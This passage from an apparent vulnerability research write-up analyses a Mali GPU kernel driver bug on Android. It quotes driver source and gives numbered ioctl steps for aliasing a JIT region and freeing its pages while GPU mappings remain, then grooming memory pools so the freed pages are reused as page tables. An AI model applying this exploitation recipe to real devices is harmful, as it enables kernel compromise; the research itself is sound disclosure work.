		<span class="n">u64</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">BASE_MEM_PROT_CPU_RD</span> <span class="o">|</span> <span class="n">BASE_MEM_PROT_GPU_RD</span> <span class="o">|</span>
			<span class="n">BASE_MEM_PROT_GPU_WR</span> <span class="o">|</span> <span class="n">BASE_MEM_GROW_ON_GPF</span> <span class="o">|</span>
			<span class="n">BASE_MEM_COHERENT_LOCAL</span> <span class="o">|</span>
			<span class="n">BASEP_MEM_NO_USER_FREE</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">kbase_mem_alloc</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">va_pages</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">,</span>
							<span class="n">info</span><span class="o">-&gt;</span><span class="n">extension</span><span class="p">,</span>
			<span class="o">&amp;</span><span class="n">flags</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">gpu_addr</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ignore_pressure_limit</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">WARN_ON</span><span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">));</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_evict_lock</span><span class="p">);</span>
			<span class="n">list_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_active_head</span><span class="p">);</span>
			<span class="n">mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_evict_lock</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_usage_id</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">bin_id</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The new JIT region takes on the specified <code class="language-plaintext highlighter-rouge">usage_id</code> for identification during freeing and it is
created with the <code class="language-plaintext highlighter-rouge">BASEP_MEM_NO_USER_FREE</code> flag, which sets the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the region [1]. This prevents the region from being freed from user space and prevents alias regions from being created that point to it [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_update_region_flags</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">)</span> 
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">BASEP_MEM_NO_USER_FREE</span><span class="p">)</span>
		<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
<span class="p">}</span>

<span class="n">u64</span> <span class="nf">kbase_mem_alias</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="n">stride</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="n">nents</span><span class="p">,</span> <span class="k">struct</span> <span class="n">base_mem_aliasing_info</span> <span class="o">*</span><span class="n">ai</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="o">*</span><span class="n">num_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">)</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
			<span class="k">goto</span> <span class="n">bad_handle</span><span class="p">;</span> <span class="cm">/* JIT regions can't be
					  * aliased. NO_USER_FREE flag
					  * covers the entire lifetime
					  * of JIT regions. The other
					  * types of regions covered
					  * by this flag also shall
					  * not be aliased.
					  */</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Naturally, calling <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> does the opposite of <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code>, but it does not
free the JIT allocation and simply adds it to the <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> for potential reuse in the
future [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_jit_free</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_current_allocations</span><span class="o">--</span><span class="p">;</span>
	<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_current_allocations_per_bin</span><span class="p">[</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span><span class="p">]</span><span class="o">--</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_DONT_NEED</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">list_move</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We can specify by id which JIT allocations we want to free when using the relevant ioctl.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">base_kcpu_command_jit_free_info</span> <span class="p">{</span>
	<span class="n">__u64</span> <span class="n">ids</span><span class="p">;</span> <span class="c1">// An array containing the JIT IDs to free</span>
	<span class="n">__u8</span> <span class="n">count</span><span class="p">;</span> <span class="c1">// number of elements in ID</span>
	<span class="n">__u8</span> <span class="n">padding</span><span class="p">[</span><span class="mi">7</span><span class="p">];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Thus, if we wanted to invoke <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> in <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>, we can do the
following:</p>

<ol>
  <li>Other routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code></li>
  <li>Initialize the JIT configurations for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code></li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and set a lower value for <code class="language-plaintext highlighter-rouge">initial_commit</code> for the region</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the region’s backing pages through <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code></li>
</ol>

<p>Recall that <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> will try to free physical pages back to the <code class="language-plaintext highlighter-rouge">kbase_context</code> mem_pool, then
the <code class="language-plaintext highlighter-rouge">kbase_device</code> mem_pool and finally the kernel, depending on whether the pool at each
stage is full. So, if we had another region that was using the same backing physical
pages and was unaware of the shrinkage, the region’s GPU page table mappings would
subsequently be pointing to pages that are already freed. To get this second region that points
to the same backing physical pages, we can use the aliasing of memory, as previously covered. We can see that when performing the mapping
of the alias region’s virtual page frame number (<code class="language-plaintext highlighter-rouge">vpfn</code>) to backing physical pages, the driver
simply uses the target region’s physical pages for the mapping (i.e. When creating an alias region in <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code>, the physical allocation for the target alias region is retrieved and stored [1]. When doing <code class="language-plaintext highlighter-rouge">mmap</code> for the alias region in order to insert GPU page table entries for the region, it maps to that previously stored physical allocation’s pages [2], so the page table entries for this region now point to the same underlying pages as the target aliased region). However, as previously mentioned, the <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code> function prevents the aliasing of JIT regions as they have the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag set [3]. This flag is intended to protect JIT regions from being aliased and per the comments, it is assumed that the flag will cover the entire lifetime of such regions.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">u64</span> <span class="nf">kbase_mem_alias</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="n">stride</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="n">nents</span><span class="p">,</span> <span class="k">struct</span> <span class="n">base_mem_aliasing_info</span> <span class="o">*</span><span class="n">ai</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="o">*</span><span class="n">num_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">)</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
				<span class="k">goto</span> <span class="n">bad_handle</span><span class="p">;</span> <span class="cm">/* JIT regions can't be
						  * aliased. NO_USER_FREE flag
						  * covers the entire lifetime
						  * of JIT regions. The other
						  * types of regions covered
						  * by this flag also shall
						  * not be aliased.
						  */</span>
	<span class="p">...</span>
	<span class="n">alloc</span> <span class="o">=</span> <span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">;</span> <span class="c1">// aliasing_reg is the target region we want to alias</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">alloc</span> <span class="o">=</span> <span class="n">kbase_mem_phy_alloc_get</span><span class="p">(</span><span class="n">alloc</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span> <span class="o">=</span> <span class="n">ai</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">offset</span> <span class="o">=</span> <span class="n">ai</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">offset</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_gpu_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		   <span class="n">u64</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">,</span>
		   <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">==</span> <span class="n">KBASE_MEM_TYPE_ALIAS</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">u64</span> <span class="k">const</span> <span class="n">stride</span> <span class="o">=</span> <span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">stride</span><span class="p">;</span>

		<span class="n">KBASE_DEBUG_ASSERT</span><span class="p">(</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">);</span>
		<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">nents</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">alloc</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mmu_insert_pages</span><span class="p">(</span>
					<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mmu</span><span class="p">,</span>
					<span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="n">stride</span><span class="p">),</span> <span class="c1">// vpfn</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="c1">// phys &lt;--- [2]</span>
						<span class="p">.</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">pages</span> <span class="o">+</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
						<span class="p">.</span><span class="n">offset</span><span class="p">,</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span><span class="p">,</span>
					<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">gwt_mask</span><span class="p">,</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">as_nr</span><span class="p">,</span>
					<span class="n">group_id</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
				<span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
					<span class="k">goto</span> <span class="n">bad_insert</span><span class="p">;</span>
			<span class="p">}</span>
           <span class="p">...</span>
           <span class="p">}</span>
     <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="p">...</span>
	 <span class="p">}</span>
     <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By making use of the vulnerability, we can remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on JIT regions and create an alias region for it. After we alias the region and
<code class="language-plaintext highlighter-rouge">mmap</code> it to create the GPU page table entries, we have the scenario where each corresponding GPU page table entry of the alias and
JIT regions point to the same backing physical page (the figure assumes the JIT
region has 2 backing physical pages and <code class="language-plaintext highlighter-rouge">mem_alias</code> just aliases the entire region).</p>

<p><img src="/assets/mali-csf-exploit/fig2-before-kbase-mem-shrink.png" alt="Before kbase_mem_shrink: both the alias region's VA pages and the JIT region's VA pages have valid GPU ATEs pointing to JIT region backing Phys Page 0 and Phys Page 1, which are not freed." /></p>

<p>If for example <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> is then called on the JIT region and <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is set to 0, both backing pages will be freed when
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> is invoked.</p>

<p><img src="/assets/mali-csf-exploit/fig3-after-kbase-mem-shrink.png" alt="After kbase_mem_shrink: the JIT region's GPU ATEs are invalidated and Phys Page 0 and Phys Page 1 are freed, but the alias region's GPU ATEs remain valid and still point to the freed physical pages." /></p>

<p>The alias region would still have a valid GPU page table mapping in place and performing GPU
writes to this memory region will still write to those freed physical pages. When
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> uses <code class="language-plaintext highlighter-rouge">kbase_free_phy_pages_helper</code> to free the physical pages, it
actually uses <code class="language-plaintext highlighter-rouge">kbase_mem_pool_free_pages</code>, as mentioned in the section <a href="#free_phy_pages_helper"><code class="language-plaintext highlighter-rouge">Memory
management and allocations in the GPU</code></a>. This returns the pages to either the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>, <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> or the kernel, in that order, depending on whether a particular pool is full. If returned to any <code class="language-plaintext highlighter-rouge">mem_pool</code>, this allows the pages to be easily re-allocated for a region’s backing pages or PGDs.</p>

<p>Concretely, to alias the JIT region before shrinking the backing pages, the following series of operations
has to be done:</p>

<ol>
  <li>Other routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code></li>
  <li>Initialize the JIT configurations for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code></li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and set a lower value for <code class="language-plaintext highlighter-rouge">initial_commit</code> for the region</li>
  <li>Use <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl) to register a queue using the JIT region’s GPU address</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code> ioctl)
to terminate the queue and remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the JIT region</li>
  <li>Create an alias to the JIT region using <code class="language-plaintext highlighter-rouge">mem_alias</code> (through <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code>
ioctl) such that the alias region’s GPU VA pages are mapped to the backing physical
pages of the JIT region</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the JIT region’s backing pages through
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. At this point, the alias region still contains valid page table entries to the freed
physical pages.</li>
</ol>

<h1 id="preparing-for-the-exploit">Preparing for the exploit</h1>

<p>As <a href="#pgd_alloc_for_exp"><code class="language-plaintext highlighter-rouge">highlighted in the section Memory management and allocations in the GPU driver</code></a>, we can force the
allocation of a new level 3 PGD by performing a memory allocation with more than 512 pages. This
allows us to reuse the freed physical pages from before as new PGDs instead of backing pages for a region. PGDs are allocated from the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> and not the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>, so we have to ensure that <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> frees the backing physical pages to the device pool instead. To achieve this, we have to make sure that the
<code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> is full at the point of freeing in <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. The maximum capacity for a <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> is
defined as <code class="language-plaintext highlighter-rouge">KBASE_MEM_POOL_MAX_SIZE_KCTX</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
 * Max size for kbdev memory pool (in pages)
 */</span>
<span class="cp">#define KBASE_MEM_POOL_MAX_SIZE_KBDEV (SZ_64M &gt;&gt; PAGE_SHIFT)
</span>
<span class="cm">/*
 * Max size for kctx memory pool (in pages)
 */</span>
<span class="cp">#define KBASE_MEM_POOL_MAX_SIZE_KCTX  (SZ_64M &gt;&gt; PAGE_SHIFT)
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">SZ_64M</code> is simply <code class="language-plaintext highlighter-rouge">0x04000000</code> (<a href="https://cs.android.com/android/kernel/superproject/+/android-gs-pantah-5.10-android13-qpr1:private/gs-google/include/linux/sizes.h;l=38">here</a>) and thus the max pool size works out to be 16384. A new
<code class="language-plaintext highlighter-rouge">kbase_context</code> always starts with 0 pages in the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> so by allocating a
region of 16384 pages and then unmapping the region, we can fill the entire context’s <code class="language-plaintext highlighter-rouge">mem_pool</code>.
Doing this right before the second call to <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> in the steps above will cause the pages freed during the
JIT free to be returned to the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> instead of the <code class="language-plaintext highlighter-rouge">kbase_context</code>
<code class="language-plaintext highlighter-rouge">mem_pool</code>, as mentioned <a href="#pool_free">here</a>. Unmapping the region can be done with a simple call to <code class="language-plaintext highlighter-rouge">munmap</code> on the region’s GPU
address returned from <code class="language-plaintext highlighter-rouge">mmap</code>. <code class="language-plaintext highlighter-rouge">munmap</code> on a GPU VA region delegates handling to
<code class="language-plaintext highlighter-rouge">kbase_cpu_vm_close</code>, and <code class="language-plaintext highlighter-rouge">kbase_mem_free_region</code> is used to perform calls to teardown the
GPU page table entries as well as potentially freeing the backing physical pages if no
references remain to their <code class="language-plaintext highlighter-rouge">kbase_mem_phy_alloc</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_cpu_vm_close</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">PF_EXITING</span><span class="p">))</span>
		<span class="n">kbase_mem_free_region</span><span class="p">(</span><span class="n">map</span><span class="o">-&gt;</span><span class="n">kctx</span><span class="p">,</span> <span class="n">map</span><span class="o">-&gt;</span><span class="n">region</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The freeing of pages to a pool involves calling <code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_array</code>, which adds pages to a
temporary list (<code class="language-plaintext highlighter-rouge">new_page_list</code>) beginning from the first page (page 0) and calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list</code>, passing in the temporary list.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_mem_pool_add_array</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span>
				     <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span>
				     <span class="n">bool</span> <span class="n">zero</span><span class="p">,</span> <span class="n">bool</span> <span class="n">sync</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
	<span class="cm">/* Zero/sync pages first without holding the pool lock */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])))</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">is_huge_head</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">||</span> <span class="o">!</span><span class="n">is_huge</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span> <span class="p">{</span>
			<span class="n">p</span> <span class="o">=</span> <span class="n">as_page</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">zero</span><span class="p">)</span>
				<span class="n">kbase_mem_pool_zero_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">sync</span><span class="p">)</span>
				<span class="n">kbase_mem_pool_sync_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>

			<span class="n">list_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">p</span><span class="o">-&gt;</span><span class="n">lru</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_page_list</span><span class="p">);</span>
			<span class="n">nr_to_pool</span><span class="o">++</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">as_tagged</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="cm">/* Add new page list to pool */</span>
	<span class="n">kbase_mem_pool_add_list</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_page_list</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>
      <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list</code> simply holds the pool lock and calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list_locked</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_mem_pool_add_list_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">page_list</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">)</span>
<span class="p">{</span>
